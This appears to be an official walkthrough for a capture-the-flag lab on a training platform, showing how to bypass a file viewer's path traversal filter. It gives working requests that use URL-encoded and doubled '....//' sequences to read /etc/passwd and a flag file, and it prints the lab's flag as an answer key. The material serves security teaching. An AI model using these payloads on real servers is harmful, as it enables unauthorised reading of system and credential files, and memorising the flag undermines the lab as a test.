HACKR.GG
hackr.gg — DevDocs — File Viewer Walkthrough
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

DevDocs — File Viewer

Path Traversal · Path Traversal
Difficulty
Intermediate
Vuln class
Path Traversal
Steps
3
// Objective
Bypass a path traversal filter to read sensitive files outside the document root.
// Tools required
BrowserBurp Suitecurl
// Step-by-step walkthrough
1
Test basic path traversal
The file viewer accepts a path parameter. Try a simple ../ escape to see if the server blocks it.
Command / Input
GET /docs?path=../../etc/passwd
Output
Error: Invalid path — traversal blocked
2
Bypass with encoding or doubled sequences
The filter strips ../ literally. Try URL double-encoding or null byte insertion to bypass.
Command / Input
GET /docs?path=..%2f..%2fetc%2fpasswd GET /docs?path=....//....//etc/passwd
Output
root:x:0:0:root:/root:/bin/bash...
....// works because the filter strips ../ once, leaving ../ in place.
3
Read the flag
Apply the same bypass to reach /flag.txt.
Command / Input
GET /docs?path=....//....//....//flag.txt
Output
HackrGG{p4th_tr4v3rs4l_f1l3_r34d}
// Flag
Flag value
HackrGG{p4th_tr4v3rs4l_f1l3_r34d}
At /flag.txt — accessible after bypassing the traversal filter with doubled sequences.
hackr.gg · Cybersecurity Education PlatformEducational use only · Do not distribute